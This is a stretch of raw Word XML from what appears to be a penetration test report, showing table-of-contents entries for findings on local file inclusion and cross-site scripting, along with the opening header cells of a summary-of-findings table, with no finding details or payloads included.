            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:pos="9019"/>
            </w:tabs>
            <w:rPr>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc131032152" w:history="1">
            <w:r w:rsidR="00900598" w:rsidRPr="008A3FB1">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:b/>
                <w:noProof/>
              </w:rPr>
              <w:t>Risk Ratings</w:t>
            </w:r>
            <w:r w:rsidR="00900598">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00900598">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00900598">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc131032152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649248B5" w14:textId="1D2A9E55" w:rsidR="00900598" w:rsidRDefault="00000000">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:pos="9019"/>
            </w:tabs>
            <w:rPr>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc131032153" w:history="1">
            <w:r w:rsidR="00900598" w:rsidRPr="008A3FB1">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:b/>
                <w:noProof/>
              </w:rPr>
              <w:t>Recommendation</w:t>
            </w:r>
            <w:r w:rsidR="00900598">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00900598">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00900598">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc131032153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5AFC3B84" w14:textId="785C3B01" w:rsidR="00900598" w:rsidRDefault="00000000">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:pos="9019"/>
            </w:tabs>
            <w:rPr>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc131032154" w:history="1">
            <w:r w:rsidR="00900598" w:rsidRPr="008A3FB1">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:b/>
                <w:noProof/>
              </w:rPr>
              <w:t>References</w:t>
            </w:r>
            <w:r w:rsidR="00900598">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00900598">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00900598">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc131032154 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00900598">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00900598">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00F55CD0">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>5</w:t>
            </w:r>
            <w:r w:rsidR="00900598">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="19842926" w14:textId="7EBD7679" w:rsidR="00900598" w:rsidRDefault="00000000">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:pos="9019"/>
            </w:tabs>
            <w:rPr>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc131032155" w:history="1">
            <w:r w:rsidR="00900598" w:rsidRPr="008A3FB1">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t xml:space="preserve">Finding 2 </w:t>
            </w:r>
            <w:r w:rsidR="009A7406">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>–</w:t>
            </w:r>
            <w:r w:rsidR="00900598" w:rsidRPr="008A3FB1">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidR="009A7406">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>LFI and Information Disclosure</w:t>
            </w:r>
            <w:r w:rsidR="00900598">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00900598">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00900598">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc131032155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7E2B4362" w14:textId="7F84EB20" w:rsidR="00900598" w:rsidRDefault="00000000">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:pos="9019"/>
            </w:tabs>
            <w:rPr>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc131032156" w:history="1">
            <w:r w:rsidR="00900598" w:rsidRPr="008A3FB1">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:b/>
                <w:noProof/>
              </w:rPr>
              <w:t>Description</w:t>
            </w:r>
            <w:r w:rsidR="00900598">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00900598">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00900598">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc131032156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5CC509BA" w14:textId="2B057450" w:rsidR="00900598" w:rsidRDefault="00000000">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:pos="9019"/>
            </w:tabs>
            <w:rPr>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc131032157" w:history="1">
            <w:r w:rsidR="00900598" w:rsidRPr="008A3FB1">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:b/>
                <w:noProof/>
              </w:rPr>
              <w:t>Proof of Concept</w:t>
            </w:r>
            <w:r w:rsidR="00900598">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00900598">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00900598">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc131032157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0E12F99E" w14:textId="7A8C7C9E" w:rsidR="00900598" w:rsidRDefault="00000000">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:pos="9019"/>
            </w:tabs>
            <w:rPr>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc131032158" w:history="1">
            <w:r w:rsidR="00900598" w:rsidRPr="008A3FB1">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:b/>
                <w:noProof/>
              </w:rPr>
              <w:t>Impact</w:t>
            </w:r>
            <w:r w:rsidR="00900598">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00900598">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00900598">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc131032158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08FEDC19" w14:textId="59C51FBC" w:rsidR="00900598" w:rsidRDefault="00000000">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:pos="9019"/>
            </w:tabs>
            <w:rPr>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc131032159" w:history="1">
            <w:r w:rsidR="00900598" w:rsidRPr="008A3FB1">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:b/>
                <w:noProof/>
              </w:rPr>
              <w:t>Risk Ratings</w:t>
            </w:r>
            <w:r w:rsidR="00900598">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00900598">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00900598">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc131032159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344E5950" w14:textId="337D2149" w:rsidR="00900598" w:rsidRDefault="00000000">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:pos="9019"/>
            </w:tabs>
            <w:rPr>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc131032160" w:history="1">
            <w:r w:rsidR="00900598" w:rsidRPr="008A3FB1">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:b/>
                <w:noProof/>
              </w:rPr>
              <w:t>Recommendation</w:t>
            </w:r>
            <w:r w:rsidR="00900598">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00900598">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00900598">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc131032160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3CC52EAD" w14:textId="679EEE5E" w:rsidR="00900598" w:rsidRDefault="00000000">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:pos="9019"/>
            </w:tabs>
            <w:rPr>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc131032161" w:history="1">
            <w:r w:rsidR="00900598" w:rsidRPr="008A3FB1">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:b/>
                <w:noProof/>
              </w:rPr>
              <w:t>References</w:t>
            </w:r>
            <w:r w:rsidR="00900598">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00900598">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00900598">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc131032161 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00900598">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00900598">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00F55CD0">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>6</w:t>
            </w:r>
            <w:r w:rsidR="00900598">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="739C69CD" w14:textId="3BEAF36C" w:rsidR="00900598" w:rsidRDefault="00000000">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:pos="9019"/>
            </w:tabs>
            <w:rPr>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc131032162" w:history="1">
            <w:r w:rsidR="00900598" w:rsidRPr="008A3FB1">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t xml:space="preserve">Finding 3 </w:t>
            </w:r>
            <w:r w:rsidR="009A7406">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>–</w:t>
            </w:r>
            <w:r w:rsidR="00900598" w:rsidRPr="008A3FB1">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidR="009A7406">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>XSS in User Profile</w:t>
            </w:r>
            <w:r w:rsidR="00900598">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00900598">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00900598">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc131032162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5293DE33" w14:textId="0EFD5B2B" w:rsidR="00900598" w:rsidRDefault="00000000">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:pos="9019"/>
            </w:tabs>
            <w:rPr>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc131032163" w:history="1">
            <w:r w:rsidR="00900598" w:rsidRPr="008A3FB1">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:b/>
                <w:noProof/>
              </w:rPr>
              <w:t>Description</w:t>
            </w:r>
            <w:r w:rsidR="00900598">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00900598">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00900598">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc131032163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0DC026C4" w14:textId="7EF4B0DF" w:rsidR="00900598" w:rsidRDefault="00000000">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:pos="9019"/>
            </w:tabs>
            <w:rPr>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc131032164" w:history="1">
            <w:r w:rsidR="00900598" w:rsidRPr="008A3FB1">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:b/>
                <w:noProof/>
              </w:rPr>
              <w:t>Proof of Concept</w:t>
            </w:r>
            <w:r w:rsidR="00900598">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00900598">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00900598">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc131032164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1F9BF7AF" w14:textId="01892E40" w:rsidR="00900598" w:rsidRDefault="00000000">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:pos="9019"/>
            </w:tabs>
            <w:rPr>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc131032165" w:history="1">
            <w:r w:rsidR="00900598" w:rsidRPr="008A3FB1">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:b/>
                <w:noProof/>
              </w:rPr>
              <w:t>Impact</w:t>
            </w:r>
            <w:r w:rsidR="00900598">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00900598">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00900598">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc131032165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3D79BD2E" w14:textId="0F41CD3D" w:rsidR="00900598" w:rsidRDefault="00000000">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:pos="9019"/>
            </w:tabs>
            <w:rPr>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc131032166" w:history="1">
            <w:r w:rsidR="00900598" w:rsidRPr="008A3FB1">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:b/>
                <w:noProof/>
              </w:rPr>
              <w:t>Risk Ratings</w:t>
            </w:r>
            <w:r w:rsidR="00900598">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00900598">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00900598">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc131032166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025B67EE" w14:textId="31C381AB" w:rsidR="00900598" w:rsidRDefault="00000000">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:pos="9019"/>
            </w:tabs>
            <w:rPr>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc131032167" w:history="1">
            <w:r w:rsidR="00900598" w:rsidRPr="008A3FB1">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:b/>
                <w:noProof/>
              </w:rPr>
              <w:t>Recommendation</w:t>
            </w:r>
            <w:r w:rsidR="00900598">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00900598">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00900598">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc131032167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07AEBD40" w14:textId="54B6DA5C" w:rsidR="00900598" w:rsidRDefault="00000000">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:pos="9019"/>
            </w:tabs>
            <w:rPr>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc131032168" w:history="1">
            <w:r w:rsidR="00900598" w:rsidRPr="008A3FB1">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:b/>
                <w:noProof/>
              </w:rPr>
              <w:t>References</w:t>
            </w:r>
            <w:r w:rsidR="00900598">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00900598">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00900598">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc131032168 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00900598">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00900598">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00F55CD0">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>7</w:t>
            </w:r>
            <w:r w:rsidR="00900598">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="559F0509" w14:textId="10C6D986" w:rsidR="00900598" w:rsidRDefault="00000000">
          <w:pPr>
            <w:pStyle w:val="TOC1"/>
            <w:tabs>
              <w:tab w:val="right" w:pos="9019"/>
            </w:tabs>
            <w:rPr>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc131032169" w:history="1">
            <w:r w:rsidR="00900598" w:rsidRPr="008A3FB1">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Appendix I - Risk Matrix</w:t>
            </w:r>
            <w:r w:rsidR="00900598">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00900598">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00900598">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc131032169 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00900598">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00900598">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00F55CD0">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>8</w:t>
            </w:r>
            <w:r w:rsidR="00900598">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="5091115C" w14:textId="35823362" w:rsidR="00900598" w:rsidRDefault="00000000">
          <w:pPr>
            <w:pStyle w:val="TOC1"/>
            <w:tabs>
              <w:tab w:val="right" w:pos="9019"/>
            </w:tabs>
            <w:rPr>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc131032170" w:history="1">
            <w:r w:rsidR="00900598" w:rsidRPr="008A3FB1">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Appendix 2 - Additional Information</w:t>
            </w:r>
            <w:r w:rsidR="00900598">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00900598">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00900598">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc131032170 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00900598">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00900598">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00F55CD0">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>9</w:t>
            </w:r>
            <w:r w:rsidR="00900598">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="1C6B3874" w14:textId="6853E4F0" w:rsidR="009B42F8" w:rsidRDefault="00000000">
          <w:pPr>
            <w:tabs>
              <w:tab w:val="right" w:pos="9025"/>
            </w:tabs>
            <w:spacing w:before="200" w:after="80" w:line="240" w:lineRule="auto"/>
            <w:rPr>
              <w:color w:val="000000"/>
            </w:rPr>
          </w:pPr>
          <w:r>
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:p>
      </w:sdtContent>
    </w:sdt>
    <w:p w14:paraId="58618777" w14:textId="77777777" w:rsidR="009B42F8" w:rsidRDefault="009B42F8"/>
    <w:p w14:paraId="3096CB74" w14:textId="77777777" w:rsidR="009B42F8" w:rsidRDefault="00000000">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="2407F836" w14:textId="77777777" w:rsidR="009B42F8" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:bookmarkStart w:id="1" w:name="_Toc131032146"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Summary of Findings</w:t>
      </w:r>
      <w:bookmarkEnd w:id="1"/>
    </w:p>
    <w:p w14:paraId="60C9E5A4" w14:textId="77777777" w:rsidR="009B42F8" w:rsidRDefault="009B42F8"/>
    <w:p w14:paraId="3C7B9CFE" w14:textId="77777777" w:rsidR="009B42F8" w:rsidRDefault="00000000">
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>A brief summary</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> of all findings appears in the table below, sorted by Risk rating.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D42A2FF" w14:textId="77777777" w:rsidR="009B42F8" w:rsidRDefault="009B42F8"/>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500"/>
        <w:gridCol w:w="6150"/>
      </w:tblGrid>
      <w:tr w:rsidR="009B42F8" w14:paraId="78D40EC5" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1365" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="307411F7" w14:textId="77777777" w:rsidR="009B42F8" w:rsidRDefault="00000000">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:pBdr>
                <w:top w:val="nil"/>
                <w:left w:val="nil"/>
                <w:bottom w:val="nil"/>
                <w:right w:val="nil"/>
                <w:between w:val="nil"/>
              </w:pBdr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>Risk</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1500" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="6FE1F7FC" w14:textId="77777777" w:rsidR="009B42F8" w:rsidRDefault="00000000">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:pBdr>
                <w:top w:val="nil"/>
                <w:left w:val="nil"/>
                <w:bottom w:val="nil"/>
                <w:right w:val="nil"/>
                <w:between w:val="nil"/>
              </w:pBdr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>Reference</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6150" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="4AF374C9" w14:textId="77777777" w:rsidR="009B42F8" w:rsidRDefault="00000000">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:pBdr>
                <w:top w:val="nil"/>
                <w:left w:val="nil"/>
                <w:bottom w:val="nil"/>
                <w:right w:val="nil"/>
                <w:between w:val="nil"/>
              </w:pBdr>
